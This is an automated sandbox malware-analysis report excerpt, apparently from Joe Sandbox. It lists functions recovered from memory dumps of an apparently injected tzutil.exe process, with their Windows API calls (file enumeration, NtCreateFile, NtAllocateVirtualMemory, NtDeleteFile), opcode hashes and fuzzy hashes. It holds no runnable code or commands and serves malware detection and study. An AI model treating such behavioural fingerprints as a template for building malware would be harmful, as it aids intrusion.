qL, xrefs: 00599D1F
@E, xrefs: 00599D66
J, xrefs: 00599C02
:&, xrefs: 00599D52

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID:
String ID: $6$*$-Y$-Y$:&$=$@E$B+$E$Eh$G$J$K$L$R,$Rz$U$X$Yu$Z$d$dn$f$h$k$qL$}
API String ID: 0-3490662132
Opcode ID: 64adda4263d61d1778638a73b60f0b503eec9a3ae5fecb519f7af636cea576ba
Instruction ID: 39c3fd1b7283d25004a2f2cb05ff6fea9dbb146a27e49d1fc3d5dd989ca85db8
Opcode Fuzzy Hash: 64adda4263d61d1778638a73b60f0b503eec9a3ae5fecb519f7af636cea576ba
Instruction Fuzzy Hash: 3132B1B0D05229CBEF24CF48C998BDDBBB2FB84308F1085D9D149AB280DB795A85DF55

Function 005AC6B0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 005AC794
FindNextFileW.KERNELBASE(?,00000010), ref: 005AC7CF
FindClose.KERNELBASE(?), ref: 005AC7DA

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: a742c8b730cba958d58ca9a4830f7349d4117fc18b8c5cd605e1f2e852c0ec47
Instruction ID: c8dde96edde9dbe6acdf1d1c9961fd83fb401ee4b21927cd391d1490b46f35b7
Opcode Fuzzy Hash: a742c8b730cba958d58ca9a4830f7349d4117fc18b8c5cd605e1f2e852c0ec47
Instruction Fuzzy Hash: 0231727194020A7BEF61DF60CC89FEF7F7CFB95754F144458B908A7181EA70AA848BA4

Function 005B90D0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 005B91CE

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 99faf70863d165c3310beeed44be0cd29308776427cac63339398d538280c57b
Instruction ID: 117113046fee3546cecce08b24a5bb45171697edd457bff0f9b4299e63802ede
Opcode Fuzzy Hash: 99faf70863d165c3310beeed44be0cd29308776427cac63339398d538280c57b
Instruction Fuzzy Hash: 7B31D5B5A01609AFDB14DF98C881EDEBBB9FF8C314F108219F918A7344D770A941CBA5

Function 005B9240 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 005B9323

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 8b26881303fe9a670bc3235135e075de32f56803a2ecf2a0325da6929d36a8f7
Instruction ID: a77649ebf32bc7f89812ea90c12b875afe3affa6c07cc3a4c1d7469db85ca5d8
Opcode Fuzzy Hash: 8b26881303fe9a670bc3235135e075de32f56803a2ecf2a0325da6929d36a8f7
Instruction Fuzzy Hash: 1A31DAB5A00609AFDB14DF98D881EDFBBB9EF8C714F108209F918A7345D770A911CBA5

Function 005B9530 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(005A1DDE,?,005B807E,00000000,00000004,00003000,?,?,?,?,?,005B807E,005A1DDE), ref: 005B95F5

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: dbb08259de3de3a835e7d35d22572d4347f58a3a7084e7cb8c140c025f6fa429
Instruction ID: 0443389d75c346afe043dfb56668cd809168fcd7828a32259278ba0d78493174
Opcode Fuzzy Hash: dbb08259de3de3a835e7d35d22572d4347f58a3a7084e7cb8c140c025f6fa429
Instruction Fuzzy Hash: 66212BB5A00309AFDB14DF98CC45EEF7BB9EF88300F108509F908AB245E770A911CBA5

Function 005B9330 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 005B93C3

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6ede13e0a5782e476506ffa381bc4429ef73809e9999648bd6c5f1ea996f4885
Instruction ID: 52d83553f3fc3c9a8f39756731740911e410eb54b9187fcab1de1513e6b38eea
Opcode Fuzzy Hash: 6ede13e0a5782e476506ffa381bc4429ef73809e9999648bd6c5f1ea996f4885
Instruction Fuzzy Hash: 72118F71A01705BADA20EB68CC46FEF7B6CEBC5714F408509F90897281E6B17A01C7A5

Function 005B93D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(005B1851,?,780157A5,?,?,005B1851,?,35262E7A,?,?,?,?,?,?,00000000,B783F5B3), ref: 005B9404

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 3d1c18abf690c68af00b4f598ef74a1842629c4662bdc5406d3ab33d1fc998b6
Instruction ID: c1af04fadacc498cb1a772c04ff801f1e3e729ae62d07d0ec65a49471e5c0f3c
Opcode Fuzzy Hash: 3d1c18abf690c68af00b4f598ef74a1842629c4662bdc5406d3ab33d1fc998b6
Instruction Fuzzy Hash: 1DE046362102157BDA20FA59DC01E9BBB6CEBC5760F008419FA08A7242DA70BA1187B4

Function 03144340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0314434A

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 35322c4535df5dfb613ea35e5824f8be48f67eb7471b4b367eb487bb6142320d
Instruction ID: 6ce7136e4b12826ea6027368ac87000907cde3bfe9e6673d0b11a4f4e842c8d0
Opcode Fuzzy Hash: 35322c4535df5dfb613ea35e5824f8be48f67eb7471b4b367eb487bb6142320d
Instruction Fuzzy Hash: 9A900231705804539140B2588984546400597E4301B55D011F4525554C8B148A565761

Function 03144650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0314465A

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55abb9e9806f3b7e0015fd5a4ca534697506dfd9dc523d8a18000dd11ad57126
Instruction ID: a8f606d087d01ce23ace9c0b1ff2d11b37bdbcc11f8642e00f721ae1e18f05f1
Opcode Fuzzy Hash: 55abb9e9806f3b7e0015fd5a4ca534697506dfd9dc523d8a18000dd11ad57126
Instruction Fuzzy Hash: 99900261701504834140B2588904406600597E5301395D115B4655560C871889559669

Function 03142B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142B6A

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bccba315005a4016f7296b85ef344d4519867cd71ec9a4911b5a797e1d582e6
Instruction ID: b291600eb0caed8b045c0a975b2d439aa02b83063ae4520511945c832e0d3592
Opcode Fuzzy Hash: 8bccba315005a4016f7296b85ef344d4519867cd71ec9a4911b5a797e1d582e6
Instruction Fuzzy Hash: CF900261302404434105B2588514616400A87E4201B55D021F5115590DC72589916525

Function 03142BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142BAA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cd2e9ed4dd9366c4bd03a80d6443dfab16be1374fa305f36a34ef8f5f3867739
Instruction ID: 633f08bbb646c207a977daff8139492dceda3d709d131d4f9e5d0de29af48514
Opcode Fuzzy Hash: cd2e9ed4dd9366c4bd03a80d6443dfab16be1374fa305f36a34ef8f5f3867739
Instruction Fuzzy Hash: A990023170540C43D150B2588514746000587D4301F55D011B4125654D87558B557AA1

Function 03142BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142BFA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 651eae46779f9acbf14325ba8855e2c89b3e723a2e5ebdb7bf2e7c636a5a71de
Instruction ID: 41806f419eb96a902d2efdb239a1b805aae54c52ec8648739b3fbbffa068a8e9
Opcode Fuzzy Hash: 651eae46779f9acbf14325ba8855e2c89b3e723a2e5ebdb7bf2e7c636a5a71de
Instruction Fuzzy Hash: F490023130140C43D180B258850464A000587D5301F95D015B4126654DCB158B597BA1

Function 03142BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142BEA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5354173a42fde4046588b719190de4b504e3bbc101ed17b6ca7e2df98c3f295d
Instruction ID: bd83c4d1d5a15aea06165286627aa1d0d3ec1d7b5d0eb5a71f062354ed098360
Opcode Fuzzy Hash: 5354173a42fde4046588b719190de4b504e3bbc101ed17b6ca7e2df98c3f295d
Instruction Fuzzy Hash: 5290023130544C83D140B2588504A46001587D4305F55D011B4165694D97258E55BA61

Function 03142AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142ADA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c699d53acfd8ffb7728ee0fc1a76758dbd76bc2feb1fba47104c07fb0d6ba4a
Instruction ID: 9aef443ac1db2e2968b40ad58808e6a454170c47b25ed9a6f3a3d06227842eb8
Opcode Fuzzy Hash: 4c699d53acfd8ffb7728ee0fc1a76758dbd76bc2feb1fba47104c07fb0d6ba4a
Instruction Fuzzy Hash: 59900435311404430105F75C47045070047C7DD351355D031F5117550CD731CD715531

Function 03142AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142AFA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 72a69f4179d1f5e2b4904d7d8555ffef391e941346e4b40c5af9bc023ed462b1
Instruction ID: 9aae4f90b66b1d0439a70a07146eaaf3d50e46b2756573d976e3e626b04ba578
Opcode Fuzzy Hash: 72a69f4179d1f5e2b4904d7d8555ffef391e941346e4b40c5af9bc023ed462b1
Instruction Fuzzy Hash: FA900225321404430145F658470450B044597DA351395D015F5517590CC72189655721

Function 03142F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142F3A

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74002d546f1a74f4f84c7f77053cc91d7dc3746a034bb9c328a4225ad0452e7b
Instruction ID: 138c7b80c63973a3d312be016b0041e735ab1aed7ba29f22a0c42691ec54b3e4
Opcode Fuzzy Hash: 74002d546f1a74f4f84c7f77053cc91d7dc3746a034bb9c328a4225ad0452e7b
Instruction Fuzzy Hash: 0C90026134140883D100B2588514B060005C7E5301F55D015F5165554D8719CD526526

Function 03142FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142FBA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31cc96386336f6b996698d2dfb1641f7f760b312f94bc8a87005ec415ce50671
Instruction ID: 3e932c8702bb2ef7f1f4712e491f2f3f668f2178d8323ca15cb139096646abde
Opcode Fuzzy Hash: 31cc96386336f6b996698d2dfb1641f7f760b312f94bc8a87005ec415ce50671
Instruction Fuzzy Hash: FD900221701404834140B268C9449064005ABE5211755D121B4A99550D875989655A65

Function 03142FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142FEA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 95658c0178d3afbc0db74d56f7235a653c7f5ffd8de098dc1e3b124a532d0e2b
Instruction ID: 85e79b2067a85b372341419b3418a5916e21580b188f84dc11c6d2f9ca668377
Opcode Fuzzy Hash: 95658c0178d3afbc0db74d56f7235a653c7f5ffd8de098dc1e3b124a532d0e2b
Instruction Fuzzy Hash: 4E900221311C0483D200B6688D14B07000587D4303F55D115B4255554CCB1589615921

Function 03142E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142E8A

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4df74fed57d48afccdd18e8e32aaf77b14e6b549faee9ec59bf3daf695429346
Instruction ID: c8c83e0ddfdbc2e8e3eb12b9510756dcfddaf503f598efbb2052cb4d2559d18b
Opcode Fuzzy Hash: 4df74fed57d48afccdd18e8e32aaf77b14e6b549faee9ec59bf3daf695429346
Instruction Fuzzy Hash: F990022170140943D101B2588504616000A87D4241F95D022B5125555ECB258A92A531

Function 03142EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142EEA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a7c6be657303a853dd53ee52e1a852af7c01b1900f92486339386a5c7b9e1ea
Instruction ID: a16a9aaffde61058cfe999cfc2459b1de852243259818702b0c9e4cc910dd09d
Opcode Fuzzy Hash: 1a7c6be657303a853dd53ee52e1a852af7c01b1900f92486339386a5c7b9e1ea
Instruction Fuzzy Hash: 4B90026130180843D140B6588904607000587D4302F55D011B6165555E8B298D516535

Function 03142D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142D1A

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55ff6f5e911f937b9b3e2b69347b34d3d9c8e6ec62b27655830e1e539f7d8135
Instruction ID: 1c34d9e4b0c002d6c2feb61485ae1960c3fd017e73163aeb4f9a33894fd19a05
Opcode Fuzzy Hash: 55ff6f5e911f937b9b3e2b69347b34d3d9c8e6ec62b27655830e1e539f7d8135
Instruction Fuzzy Hash: 6E90022931340443D180B258950860A000587D5202F95E415B4116558CCB1589695721

Function 03142D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142D3A

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6cb7671cc8937b58f90f33bb380deee5c6c5000b5b33d16c989e044e8fc86348
Instruction ID: 707562966d43ea5fc17588d61ab043787c107e90e4819f727a50a83141362bea
Opcode Fuzzy Hash: 6cb7671cc8937b58f90f33bb380deee5c6c5000b5b33d16c989e044e8fc86348
Instruction Fuzzy Hash: 1B90022130140443D140B25895186064005D7E5301F55E011F4515554CDB1589565622

Function 03142DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142DDA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31a7756ebceb634208ca9cabbad66bda6639b4bcb61bcc9d7826222fb7d1a80a
Instruction ID: 01ba7ec41d4f7203090c5a0465dcdbd4a31e6e561707b296b01431390499de7a
Opcode Fuzzy Hash: 31a7756ebceb634208ca9cabbad66bda6639b4bcb61bcc9d7826222fb7d1a80a
Instruction Fuzzy Hash: 7D900221342445935545F2588504507400697E4241795D012B5515950C87269956DA21

Function 03142DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142DFA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c6ea1175c9cff227b54da7813f09498a5638f226044675c62221e8926fd303e
Instruction ID: 0ae27c54dfd0d537dc4dad5c240cf07dfe5b9875c13104f3e7084c2a719ae119
Opcode Fuzzy Hash: 4c6ea1175c9cff227b54da7813f09498a5638f226044675c62221e8926fd303e
Instruction Fuzzy Hash: C990023130140853D111B2588604707000987D4241F95D412B4525558D97568A52A521

Function 03142C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142C7A

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7fb9e6050eda42f6dc13ee97c0d2b693c834636f8b39a222b22bb900851cf615
Instruction ID: 7daee188a8104999bc7a9112672e8b4c33101dda7119bfab3691811213822f46
Opcode Fuzzy Hash: 7fb9e6050eda42f6dc13ee97c0d2b693c834636f8b39a222b22bb900851cf615
Instruction Fuzzy Hash: D290023130148C43D110B258C50474A000587D4301F59D411B8525658D879589917521

Function 03142C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142C6A

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5fc2fdc773cc8f0bb27c5a7109d1b9f5f630e0085fae5fdcd0c5ec583e3ad3a7
Instruction ID: 8a0c24688bd6bdcb37fe90bbb067c54145cb56ab3382a4fab57aafc3d061ed59
Opcode Fuzzy Hash: 5fc2fdc773cc8f0bb27c5a7109d1b9f5f630e0085fae5fdcd0c5ec583e3ad3a7
Instruction Fuzzy Hash: F990023130140C83D100B2588504B46000587E4301F55D016B4225654D8715C9517921

Function 03142CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142CAA

Memory Dump Source

